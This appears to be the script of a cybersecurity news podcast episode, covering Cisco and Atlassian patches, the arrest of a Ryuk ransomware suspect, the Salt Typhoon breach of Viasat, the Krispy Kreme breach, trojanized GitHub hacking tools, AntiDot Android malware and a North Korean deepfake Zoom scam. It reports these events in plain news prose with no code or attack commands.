In today’s cybersecurity news…
Cisco, Atlassian fix high-severity vulnerabilities
Cisco’s release is related to firmware updates for Meraki devices. The vulnerability in question affects the AnyConnect VPN server and could allow attackers to make these products restart, leading to a DoS condition. This vulnerability has a CVE number and CVSS score of 8.6. The bug can be exploited remotely. Atlassian “announced patches for five vulnerabilities in third-party dependencies in Bamboo, Bitbucket, Confluence, Crowd, and Jira.” These also have CVE numbers which are listed in the show notes for this episode.
CVE-2025-22228 (an improper authorization in Spring), CVE-2025-24970 (a DoS flaw in the Netty framework), CVE-2024-38816 (a path traversal related to the WebMvc.fn and WebFlux.fn web frameworks), CVE-2024-57699 (a DoS bug in Netplex Json-smart), and CVE-2025-31650 (DoS in Apache Tomcat).”
Alleged Ryuk ransomware gang member arrested and extradited
A 33 year old “foreign national” has been arrested in Kyiv and extradited to the U.S., for his alleged role in extorting more than $100 million from victims across the world, as part of the Ryuk cybercrime gang. The announcement was made by Ukraine’s Office of the Prosecutor General, but no name was given. Ukrainian investigators described the man’s activities as “searching for vulnerabilities in the corporate networks of the victim companies” in other words an “initial access broker.”
Telecom company Viasat attacked by Salt Typhoon
The satellite communications company Viasat has announced it has become the latest telecom industry victim of China’s Salt Typhoon cyber-espionage group. Viasat provides satellite broadband services to “governments worldwide and aviation, military, energy, maritime, and enterprise customers.” It has 189,000 broadband subscribers in the U.S. As reported by Bloomberg, “the company discovered the Salt Typhoon breach earlier this year and has been working with federal authorities to investigate the attack.”
Krispy Kreme discusses November breach impact
The donut company has now released information on the cyberattack that it suffered last November. Its filing with Maine’s Attorney General shows that cybercriminals accessed data belonging to more than 160,000 people. Along with standard PII, the haul also included financial account information including credit or debit card information along with access information, as well as: email addresses and passwords. biometric data, USCIS or Alien Registration Numbers, U.S. military ID numbers, medical or health information and health insurance information. Some experts question the company’s need to collect this much data as well as the quality of their pre-breach security.
Huge thanks to our sponsor, Adaptive Security
Trusted by Fortune 500s and backed by Andreessen Horowitz and OpenAI, Adaptive helps you stay ahead of AI-driven threats.
Learn more at adaptivesecurity.com.
Threat groups distribute malware via open source repos
Researchers at Trend Micro and ReversingLabs are warning of a campaign that appears to “target red teams, novice cybercriminals, and developer environments through trojanized open source hacking tools.” One of these campaigns from the Water Curse group involved “at least 76 GitHub accounts linked to repositories that had malicious payloads injected into build scripts and project files.” The intent of the payloads is to “steal credentials, browser data, and session tokens,” and to provide the threat actor with persistent remote access to the compromised systems. A separate campaign from a group called Banana Squad involves “more than 67 GitHub repositories promising Python-based hacking tools but delivering trojanized look-alikes of other repositories.”
Community organizations need more cybersecurity help says report
More needs to be done to protect, “target-rich but resource poor community organizations like hospitals, schools, utilities and municipal governments,” according to a new report from the Cyber Resilience Corps. The authors of the report, Sarah Powazek and Grace Menna, state, “community organizations as a whole are falling through the cracks, and current efforts are not enough to help them protect themselves online.” As Derek Johnson writes in Cyberscoop, “experts have long identified these types of [community] organizations as the soft underbelly of America’s cybersecurity problem: important enough that their disruption could cause real world harms, making them attractive targets for profit-minded hackers or foreign intelligence services, but too small and under-resourced to do anything meaningful about it.”
(Cyberscoop and Berkely Center for Long-Term Cybersecurity)
Android malware surge uses overlays, virtualization fraud and NFC theft
An Android malware named AntiDot has already compromised nearly 4,000 devices through 273 unique campaigns. AntiDot is Malware-as-a-Service operated by a financially motivated threat actor LARVA-398 and sold on underground forums. It is advertised as a “three-in-one” solution with capabilities to record the device screen, “intercept SMS messages, and extract sensitive data from third-party applications.” It is thought to be delivered through malicious advertising and tailored phishing campaigns. A link to the report from security firm Prodaft is available in the show notes to this episode.
(The Hacker News and Prodaft Report)
North Korea’s tricky ClickFake deepfake scam
A cautionary tale from the crypto world, but equally applicable to regular businesses and organizations. Security firm Huntress reports on a deepfake/social engineering scam in which an employee of a cryptocurrency foundation was invited to talk with a collection of executives of an external company, via Zoom. The short version of this story: upon accepting the Calendly invite, the employee “joined a group Zoom meeting that included several deepfakes of known members of the senior leadership of their company, along with other external contacts.” The employee found that his microphone was not being heard on the call, at which point the deepfake personas sent him a Zoom extension which had been altered to stealthily download a next-stage payload from a remote server. This is now being referred to as a ClickFake interview since it has a similar “I can fix it” vibe as the better-known ClickFix campaigns. The longer version of this story is available through the show notes to this episode.